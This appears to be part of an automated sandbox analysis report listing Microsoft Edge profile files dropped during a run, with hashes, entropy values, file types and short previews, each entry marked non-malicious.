                                                                                                                                                                                                                                                                                                  SHA1:96B64104FEE8F812F2A3AC640BEC228AFB12F42E
                                                                                                                                                                                                                                                                                                  SHA-256:C239AD6488C9D29DA05DDFA40FBDE75C455D32D79FF18ED01694C7862F8C85EF
                                                                                                                                                                                                                                                                                                  SHA-512:48CA7B4286EFFFB9154BEA6AD3F022129FBF24C1F9384538DA3359613DF2BE8C088F068AEC0D52FBD9BFCF0E9E7E82073087AD05035FCBC35ABF79F672EAC151
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379405060471109","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):24853
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.566358911446204
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:WZzljYWPrXfGd8F1+UoAYDCx9Tuqh0VfUC9xbog/OVuXWVsrwjypRtu5:WZzljYWPrXfGdu1jaPmVFwt2
                                                                                                                                                                                                                                                                                                  MD5:A956E0076959A92FE6BA2186DAF41D72
                                                                                                                                                                                                                                                                                                  SHA1:0F5FB90FE215BB72A3CA26CB186107176860E1FF
                                                                                                                                                                                                                                                                                                  SHA-256:DC99216303DAC945AC9E7E28C621A62088CAC185C081A78DA213963A7174E669
                                                                                                                                                                                                                                                                                                  SHA-512:3CF6A92D93DD8F2DEB6E00521522FED1CBC95039660A2697A464D747D4F6D6C086E1DCA221E75E8B10979A9CCF6522057A96C3557C673EC95D69806C318D4743
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379405059999046","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379405059999046","location":5,"ma
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):80
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.323098996850684
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:chltUQ2Hm4kxH4xRNwBgzNnNurkXn:chXUQI2xH8BzNmen
                                                                                                                                                                                                                                                                                                  MD5:8DA62954B0B14642CF287A260418E39B
                                                                                                                                                                                                                                                                                                  SHA1:E82BF98669AE1D73BBD9294D9F454044D5C2622E
                                                                                                                                                                                                                                                                                                  SHA-256:B7E25784D1B3A3653C618822715DAE7CC86BF0B05FFF0CF3C5D6A1FB169F0614
                                                                                                                                                                                                                                                                                                  SHA-512:E44DC92CAA0579A81CBF176A589493421AAD851D7006603B54684EE8CBFC67F572F2B0219F4483227F3FF9CC614D882B2ADB8060873E358C7D6870CAF9E3865C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):299
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.138565416883806
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:JoLRq1923oH+TcwtE/a252KLljq5sN+q2P923oH+TcwtE/a2ZIFUv:JoLxYeb8xLhE1v4Yeb8J2FUv
                                                                                                                                                                                                                                                                                                  MD5:1BFC1BBC0D656DDE534657198474443C
                                                                                                                                                                                                                                                                                                  SHA1:9E2E8061CA77456BA813AFC2ED697F4DC0348EB8
                                                                                                                                                                                                                                                                                                  SHA-256:5341672198F8EB088A2878C33E43F8631772B52DBA5DC2F220799C4915379485
                                                                                                                                                                                                                                                                                                  SHA-512:5F9B156E482E2A30690863A4EB6029FD641C2115652106649EEDB6D5CE8DCD4830BC0B07B648D37C499A9A2FECBFA0D4D9748806EFFD133DE299DF52522DFEF2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:36.144 1c18 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/23-00:24:36.162 1c18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):114583
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.578492903515659
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:kU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtsf387ekf7k3:J9LyxPXfOxr1lMe1nL/5L/TXE6n7dm
                                                                                                                                                                                                                                                                                                  MD5:BF48F95690853F2CD0948C653D33BC42
                                                                                                                                                                                                                                                                                                  SHA1:4576D9AA1BB7510D3110DF160D64D6963C6E4E9D
                                                                                                                                                                                                                                                                                                  SHA-256:D9D30F321E25358F06A92EA4B66E3650C9716FC5C6741D2EF40EF15ABAF29DA1
                                                                                                                                                                                                                                                                                                  SHA-512:EA92D9B06057C8A249C9A751724D31612FFE6D77B80BD0A205E832E25F5D3E98973386750950252203BA0A202035746DA48A5E0A78B30BCECF5647C6F16B624C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:DIY-Thermocam raw data (Lepton 2.x), scale 16384-1040, spot sensor temperature 88544371553805847756800.000000, unit celsius, color scheme 0, show spot sensor, calibration: offset 8389120.000000, slope 158465089740720881248604520448.000000
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):189129
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.388307037922387
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:9PUIry3HHHKwP09Wz+r4AL/ofTfd6ovbGX1gbu9fUscLO:gKwP1z+XL/uztGVWO
                                                                                                                                                                                                                                                                                                  MD5:1FFBBA1524836439E8A74DF2211EFBCE
                                                                                                                                                                                                                                                                                                  SHA1:DA5B91BEAFF2BAB164E82109F4C7F2E2DC86D7DC
                                                                                                                                                                                                                                                                                                  SHA-256:D934C727B3BF94DEDC5F75D9214FB8F847277A9304475287D849DAF27AFA11BB
                                                                                                                                                                                                                                                                                                  SHA-512:EDB8DF790DD34FE925DF734FFD3B6166F2418BDD865D5289DC61512F80B28AF3F772EC07C7A591013DFE1AEB60A5EDB69AB67CAC3309B55EA42C0DDCE4810F8B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):24
                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                                  MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                                  SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                                  SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                                  SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:0\r..m..................
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):72
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5376346459829513
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:HUx9Xl/lYV/lxEgQ/hb9l:0xNYWFlH
                                                                                                                                                                                                                                                                                                  MD5:216E9D278C4BEE4A6B57549AAE651DCF
                                                                                                                                                                                                                                                                                                  SHA1:AC8C677F219264430B937C8A20D78770840EBA8C
                                                                                                                                                                                                                                                                                                  SHA-256:29B256BDB9CCD9BF89B83D043345B3EC69409225656624249F7E855719899537
                                                                                                                                                                                                                                                                                                  SHA-512:2290BC87C7CC466C59829F27696133F57C8F0DA879E4C2D2176AD39E5EBAAD06F9503AE88E11BDA013CF46231854E8A2912D9B3A6BBD9A875EE7528FF5613046
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:@......hoy retne.........................X....,................h..~../.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):8029
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.3483989383968433
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:4te6gpc07+EG5hsbKE10VYvLVtW9Xp+QKiEgLl9iSraXZXc8o:4ngp05huKE19W9Xp+HMLl9iSrqe8o
                                                                                                                                                                                                                                                                                                  MD5:39E7AF3DA8E24800F2BFB0BB9F59AE2E
                                                                                                                                                                                                                                                                                                  SHA1:589B56612C61623B15BB29D3C2C4AB1E94C4052B
                                                                                                                                                                                                                                                                                                  SHA-256:0D8CB27E19C3C46A58F78E7A2562C7D278B92804EEDDF2FC6030937A5F3D474B
                                                                                                                                                                                                                                                                                                  SHA-512:C83A05E18E017D6889E2B07A54395479330EF53828DCA7D42C9321BAE74D4BD0D35D11702DA172F86763EEF36F6DA145034668D2CD60385D6A22BA6D9964E76D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...............S..Yb................next-map-id.1.Cnamespace-0d64bf1a_aef4_4228_9e6f_33c06e9c463d-https://ntp.msn.com/.0s....................map-0-shd_sweeper.;{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.,.p.r.g.-.1.s.w.-.c.n.h.o.r.o.,.1.s.-.r.c.h.o.r.o.,.p.r.g.-.c.a.l.-.h.o.r.o.s.c.o.p.e.,.p.r.g.-.e.h.p.s.b.h.v.,.1.s.-.p.n.p.s.n.i.c.e.r.t.,.p.r.g.-.1.s.w.-.s.a.g.e.e.x.3.c.,.p.r.g.-.1.s.w.-.s.a.-.u.i.e.n.i.c.h.e.t.5.b.,.p.r.g.-.1.s.w.-.s.a.-.l.o.n.g.t.e.n.s.o.r.c.,.p.r.g.-.1.s.w.-.t.m.u.i.d.s.y.n.c.r.f.w.o.e.r.r.,.p.r.g.-.1.s.w.-.r.e.f.r.e.s.h.p.,.p.r.g.-.1.s.w.-.t.m.u.i.d.1.s.s.y.n.c.,.p.r.g.-.c.g.-.c.r.o.s.a.l.o.c.1.,.t.p.s.n.-.p.r.g.l.d.n.g.-.c.,.p.r.g.-.1.s.w.-.t.p.s.n.p.g.2.,.p.r.g.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1366344506739
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:70bN9+q2P923oH+TcwtrQMxIFUt8wcyJZmw+jqX9VkwO923oH+TcwtrQMFLJ:70bN4v4YebCFUt8wcyJ/+jkD5LYebtJ
                                                                                                                                                                                                                                                                                                  MD5:5CCDAFD1294CE790C4699EB37A4D75DE
                                                                                                                                                                                                                                                                                                  SHA1:61B231D32D7C1E4722172CDED6D0F5444571FF03
                                                                                                                                                                                                                                                                                                  SHA-256:5694D2A83BB7195CA835C428D187716602D760764994E88046B38B45C64EF230
                                                                                                                                                                                                                                                                                                  SHA-512:B6C21676A125E286C85E9F34B1F2D3960B7791A8152D15B62C8AB53990BE7D9F1766B7F6ED5D2CBBF85485CD2C9A60DD1D9A86D2CB6391F93EAB7CF6C1B33931
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.748 1db8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/23-00:24:20.749 1db8 Recovering log #3.2024/12/23-00:24:20.752 1db8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1443
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.842236636005581
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:3bdyespsAF4unxKtLp3X2amEtG1ChqZfAQKkOAM4:3ZgzFcLp2FEkChi5HOp
                                                                                                                                                                                                                                                                                                  MD5:49D833AF68450BC684C024573A1F465A
                                                                                                                                                                                                                                                                                                  SHA1:04ACC27B37C0EA2A23C302D4BC7D86F61C1F8F6D
                                                                                                                                                                                                                                                                                                  SHA-256:87FE01002DDFEA5752C2629B44864A4EC04756DB334CA818BCFDDC59B0E0DFFC
                                                                                                                                                                                                                                                                                                  SHA-512:E9EC63D760050660EA2B712307C6ADA027142F392413E0B75DF6AA67258BBE7F4D56FAD05B20666F47C85AC86BAF361108B868279CEA9846D68F76C53C079AB6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SNSS.........(V.............(V......"..(V.............(V.........(V.........(V.........(V....!....(V.................................(V..(V1..,.....(V$...0d64bf1a_aef4_4228_9e6f_33c06e9c463d.....(V.........(V.................(V.....(V.........................(V....................5..0.....(V&...{98952893-68FF-4A5D-A164-705C709ED3DB}.......(V.........(V............................(V.............(V........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......kf.5.)..lf.5.).................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                  MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                  SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                  SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                  SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):352
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.087432715414863
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:ub+q2P923oH+Tcwt7Uh2ghZIFUt88HrZmw+2VkwO923oH+Tcwt7Uh2gnLJ:Nv4YebIhHh2FUt88Hr/+m5LYebIhHLJ
                                                                                                                                                                                                                                                                                                  MD5:D07D7D203249388B845A8F0C41C3A2C1
                                                                                                                                                                                                                                                                                                  SHA1:A676B390BA0AEA55F13F46A6C91F4559EE2B92BD
                                                                                                                                                                                                                                                                                                  SHA-256:4BBB402F9EFD6EEEA51450854A8055FCF0B26E33179FFD704AE266D5FEC70B66
                                                                                                                                                                                                                                                                                                  SHA-512:4B56DC24EA80432CAACAC5652B1FF658693E174FC321182A61D0D31A931F3BF17032EF561A3F1F2C560B51029093E0A1EFC7C80D4EA44C2747FD297932D45F42
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.005 1b48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/23-00:24:20.006 1b48 Recovering log #3.2024/12/23-00:24:20.015 1b48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):434
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.211185197987916
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:D9+q2P923oH+TcwtzjqEKj3K/2jMGIFUt8jJZmw+Y9VkwO923oH+TcwtzjqEKj3N:D4v4YebvqBQFUt8jJ/+YD5LYebvqBvJ
                                                                                                                                                                                                                                                                                                  MD5:E9724DB2FA9F0C5B9F3308A3B9CDA1DA
                                                                                                                                                                                                                                                                                                  SHA1:51490F5684C689ED8A6BFE7C403DB2A762100A98
                                                                                                                                                                                                                                                                                                  SHA-256:F4AF348673CCA3A7DAB529742ADC2DDC09F80AF923B02CFF5883836EF64ABB0C
                                                                                                                                                                                                                                                                                                  SHA-512:9AADF94E8E0EF14253EEE5E770E12DA81EECD3709A3BC2FD8C87E552EC43680289B3FF523D3F5730977C2F5D3CD93CB33B4B500B295C0B38139CA38D5D129F5B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.774 1db8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/23-00:24:20.775 1db8 Recovering log #3.2024/12/23-00:24:20.778 1db8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
